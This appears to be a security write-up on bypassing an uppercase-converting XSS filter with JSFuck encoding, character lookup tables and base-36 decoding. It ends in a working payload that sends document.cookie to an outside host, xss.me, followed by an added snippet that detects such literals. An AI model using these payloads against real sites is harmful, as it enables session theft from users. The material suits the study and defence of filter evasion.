0x00 Question

An XSS I ran into once: the application used PHP to convert every letter of the input to uppercase, and also filtered keywords such as src along with all kinds of tags.

0x01 Some Links

http://holyvier.blogspot.jp/2011/09/javascript-obfuscation-part-2-strings.html

http://holyvier.blogspot.jp/2011/10/javascript-obfuscation-getting-window.html

http://holyvier.blogspot.jp/2015/05/northsec-xss-challenge-writeups.html

0x02 JSFuck bypass Uppercase

If the input length is not restricted, JSFuck encoding can be used to bypass the filter, since JSFuck contains no letters at all:

<script>alert(1)</script>

<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script>

0x03 String concatenation bypass for Uppercase

When JS evaluates certain expressions it produces strings such as NaN, undefined or false, which can be stored in a variable, for example:

By indexing into those strings we can pick out the characters we want, concatenate them into the desired string, and execute the command we want, for example:

Below is the letter lookup table (entries marked * depend on the engine's native-function string representation):

a    (!1+"")[1]
b    (1+{})[3]
c    (1+{})[6]
d    ([][[]]+"")[2]
e    ([][[]]+"")[3]
f    ([][[]]+"")[4]
i    ([][[]]+"")[5]
j    (1+{})[4]
l    (!1+"")[2]
m*  (1..constructor+"")[11]
n    ([][[]]+"")[1]
o    (1+{})[2]
r    (!0+"")[1]
s    (!1+"")[3]
t    (!0+"")[0]
u    ([][[]]+"")[0]
v*  ([].sort+"")[23]
y    (1/0+"")[7]

This approach relies on two functions: constructor and toString.

Via constructor (applied twice to an empty array) we reach the bare Function constructor, which can execute arbitrary code.

toString can produce arbitrary lowercase words through radix conversion, for example converting decimal to base 36:

17795081 -> alert
1966241552 -> window
1698633989591 -> location
1071753937337 -> document
767051222 -> cookie

Concatenating in this way yields the desired payload, for example:

The complete exploit is:

$=(1+{})[6]+(1+{})[2]+([][[]]+"")[1]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[0]+(1+{})[6]+(!0+"")[0]+(1+{})[2]+(!0+"")[1];

$$=[][$][$];

_=(!0+"")[0]+(1+{})[2]+"S"+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[5]+([][[]]+"")[1]+(""[$]+"")[14];

$$(1966241552[_](36)+"."+1698633989591[_](36)+"='http://xss.me/'+"+1071753937337[_](36)+"."+767051222[_](36))();
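The base-36 trick above (both the decimal-to-word table and the final payload) is what a reviewer or filter rule has to see through; an uppercase filter does nothing against it because digits have no case. The following is an added defender-side example, not code from the original post: it decodes every `<number>[...](36)` / `<number>.toString(36)` call in an input and flags the identifiers they spell. The function and set names are this example's own.

```javascript
// Added example (not from the original post): decode the radix-36 numeric
// literals this technique relies on, so a log reviewer or WAF rule can see
// which identifiers an input is really spelling out.

// Hypothetical watchlist; extend it for your own application.
const SUSPICIOUS_IDENTIFIERS = new Set([
  "alert", "window", "location", "document", "cookie",
  "constructor", "eval", "function", "fetch",
]);

// Matches  <digits>.toString(36),  <digits>..toString(36),
// (<digits>).toString(36)  or  <digits>[anything](36),
// e.g. 1966241552[_](36) from the payload above. Case-insensitive because the
// scenario on this page upper-cases the input before it reaches the browser.
const RADIX36_CALL = /(\d+)\s*\)?\s*(?:\.?\.toString|\[[^\]]*\])\s*\(\s*36\s*\)/gi;

function decodeRadix36Literals(source) {
  const decoded = [];
  for (const m of source.matchAll(RADIX36_CALL)) {
    // BigInt keeps full precision for literals above 2^53 (the values on this
    // page are smaller, but a longer word would not be).
    decoded.push(BigInt(m[1]).toString(36));
  }
  const hits = decoded.filter((w) => SUSPICIOUS_IDENTIFIERS.has(w));
  return { decoded, hits, suspicious: hits.length > 0 };
}

// Constructed sample: the final payload line from this post.
const SAMPLE = `$$(1966241552[_](36)+"."+1698633989591[_](36)+"='http://xss.me/'+"+1071753937337[_](36)+"."+767051222[_](36))();`;

// decodeRadix36Literals(SAMPLE)
// -> decoded: ["window","location","document","cookie"], suspicious: true
```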

That's all; thanks to VV for the help.